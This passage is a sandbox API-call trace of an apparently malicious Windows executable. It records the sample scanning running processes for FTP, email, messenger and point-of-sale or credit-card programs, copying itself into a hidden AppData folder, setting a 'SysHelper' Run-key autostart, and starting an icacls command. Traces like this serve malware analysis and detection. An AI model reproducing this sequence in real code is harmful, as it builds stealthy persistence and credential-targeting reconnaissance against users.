hModule=0xc20000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0155.244] CloseHandle (hObject=0x5c0) returned 1 [0155.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d4) returned 0x5c0 [0155.244] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.246] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1080000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0155.246] CloseHandle (hObject=0x5c0) returned 1 [0155.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x5c0 [0155.246] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.248] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb00000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0155.249] CloseHandle (hObject=0x5c0) returned 1 [0155.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x31c) returned 0x5c0 [0155.249] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.251] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11c0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0155.251] CloseHandle (hObject=0x5c0) returned 1 [0155.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x5c0 [0155.251] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.253] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa40000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0155.254] CloseHandle (hObject=0x5c0) returned 1 [0155.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d4) returned 0x5c0 [0155.254] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.256] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb20000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0155.256] CloseHandle (hObject=0x5c0) returned 1 [0155.256] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x810) returned 0x5c0 [0155.256] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.258] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xca0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0155.259] CloseHandle (hObject=0x5c0) returned 1 [0155.259] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x5c0 [0155.259] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.261] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb00000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0155.262] CloseHandle (hObject=0x5c0) returned 1 [0155.262] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x5c0 [0155.262] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.264] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0155.265] CloseHandle (hObject=0x5c0) returned 1 [0155.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x840) returned 0x5c0 [0155.265] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.266] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x50000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0155.267] CloseHandle (hObject=0x5c0) returned 1 [0155.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x850) returned 0x5c0 [0155.267] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.269] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1280000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0155.269] CloseHandle (hObject=0x5c0) returned 1 [0155.269] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x5c0 [0155.269] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.271] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xff0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0155.271] CloseHandle (hObject=0x5c0) returned 1 [0155.271] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x870) returned 0x5c0 [0155.271] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.273] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0155.274] CloseHandle (hObject=0x5c0) returned 1 [0155.274] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x880) returned 0x5c0 [0155.274] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.276] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1180000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0155.276] CloseHandle (hObject=0x5c0) returned 1 [0155.276] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x890) returned 0x5c0 [0155.276] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.279] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x870000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0155.279] CloseHandle (hObject=0x5c0) returned 1 [0155.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a0) returned 0x5c0 [0155.279] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.281] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xcf0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0155.282] CloseHandle (hObject=0x5c0) returned 1 [0155.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b0) returned 0x5c0 [0155.282] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.284] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0155.284] CloseHandle (hObject=0x5c0) returned 1 [0155.284] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c0) returned 0x5c0 [0155.285] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.287] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0155.287] CloseHandle (hObject=0x5c0) returned 1 [0155.287] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x5c0 [0155.287] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.290] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd90000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0155.290] CloseHandle (hObject=0x5c0) returned 1 [0155.290] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e0) returned 0x5c0 [0155.290] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.292] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe70000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0155.293] CloseHandle (hObject=0x5c0) returned 1 [0155.293] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f0) returned 0x5c0 [0155.293] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.295] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x870000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0155.296] CloseHandle (hObject=0x5c0) returned 1 [0155.296] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x5c0 [0155.296] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.298] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x3d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0155.299] CloseHandle (hObject=0x5c0) returned 1 [0155.299] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x5c0 [0155.299] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.301] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe90000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0155.302] CloseHandle (hObject=0x5c0) returned 1 [0155.302] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x5c0 [0155.302] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.304] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf80000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0155.305] CloseHandle (hObject=0x5c0) returned 1 [0155.305] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x5c0 [0155.305] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.307] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0155.308] CloseHandle (hObject=0x5c0) returned 1 [0155.308] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x5c0 [0155.308] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.311] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1370000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0155.311] CloseHandle (hObject=0x5c0) returned 1 [0155.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x950) returned 0x5c0 [0155.312] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.314] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11a0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0155.315] CloseHandle (hObject=0x5c0) returned 1 [0155.315] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x960) returned 0x5c0 [0155.315] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.317] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x40000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0155.317] CloseHandle (hObject=0x5c0) returned 1 [0155.318] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x5c0 [0155.318] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.320] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x3d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0155.321] CloseHandle (hObject=0x5c0) returned 1 [0155.321] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x5c0 [0155.321] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.323] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11c0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0155.324] CloseHandle (hObject=0x5c0) returned 1 [0155.324] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x5c0 [0155.324] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.326] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0155.327] CloseHandle (hObject=0x5c0) returned 1 [0155.327] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x5c0 [0155.327] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.329] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x940000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0155.329] CloseHandle (hObject=0x5c0) returned 1 [0155.330] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x5c0 [0155.330] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.332] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="monthly-appearing.exe") returned 0x15 [0155.333] CloseHandle (hObject=0x5c0) returned 1 [0155.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x0 [0155.333] CloseHandle (hObject=0x0) returned 0 [0155.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa08) returned 0x0 [0155.333] CloseHandle (hObject=0x0) returned 0 [0155.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb38) returned 0x0 [0155.333] CloseHandle (hObject=0x0) returned 0 [0155.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaec) returned 0x5c0 [0155.333] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0155.336] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x400000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned 0x46 [0155.337] CloseHandle (hObject=0x5c0) returned 1 [0155.337] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0155.337] CloseHandle (hObject=0x0) returned 0 [0155.337] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x67c) returned 0x0 [0155.337] CloseHandle (hObject=0x0) returned 0 [0155.337] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0155.337] CloseHandle (hObject=0x0) returned 0 [0155.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x289ee8 [0155.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x2bbd30 [0155.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x322bd98 [0155.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x2ac858 [0155.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x2acac0 [0155.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x323eac8 [0155.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x323ed30 [0155.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x323ef98 [0155.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x323f200 [0155.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x323f468 [0155.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x323f6d0 [0155.355] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d558 | out: phkResult=0x18d558*=0x5c0) returned 0x0 [0155.355] RegQueryValueExW (in: hKey=0x5c0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d554, lpData=0x18bc80, lpcbData=0x18d538*=0x400 | out: lpType=0x18d554*=0x0, lpData=0x18bc80*=0x0, lpcbData=0x18d538*=0x400) returned 0x2 [0155.355] RegCloseKey (hKey=0x5c0) returned 0x0 [0155.356] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0155.356] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0155.356] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" " [0155.356] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" ", pNumArgs=0x18d51c | out: pNumArgs=0x18d51c) returned 0x3251088*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0155.357] lstrcpyW (in: lpString1=0x18b480, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0155.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned="CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0155.357] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18cc80 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0155.357] UuidCreate (in: Uuid=0x18d4cc | out: Uuid=0x18d4cc) returned 0x0 [0155.358] UuidToStringW (in: Uuid=0x18d4cc, StringUuid=0x18d560 | out: StringUuid=0x18d560) returned 0x0 [0155.358] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x3226718 [0155.358] RpcMgmtStatsVectorFree (in: StatsVector=0x18d560 | out: StatsVector=0x18d560) returned 0x0 [0155.358] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="0cf16e90-25f3-4a59-b809-8330957d8bce" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce") returned 1 [0155.358] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\0cf16e90-25f3-4a59-b809-8330957d8bce"), lpSecurityAttributes=0x0) returned 1 [0155.359] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xb0) returned 0x31dc9d0 [0155.359] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xb0) returned 0x31dca88 [0155.359] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce", pMore="CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned 1 [0155.359] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe")) returned 0 [0155.360] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe"), bFailIfExists=0) returned 1 [0155.425] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d55c | out: phkResult=0x18d55c*=0x5c4) returned 0x0 [0155.425] lstrcpyW (in: lpString1=0x18c480, lpString2="\"" | out: lpString1="\"") returned="\"" [0155.425] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" [0155.425] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --AutoStart" [0155.425] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --AutoStart") returned 165 [0155.425] RegSetValueExW (in: hKey=0x5c4, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --AutoStart", cbData=0x14a | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --AutoStart") returned 0x0 [0155.426] RegCloseKey (hKey=0x5c4) returned 0x0 [0155.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x32132e0 [0155.427] SetLastError (dwErrCode=0x0) [0155.427] lstrcpyW (in: lpString1=0x18a480, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0155.427] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce" [0155.427] lstrcatW (in: 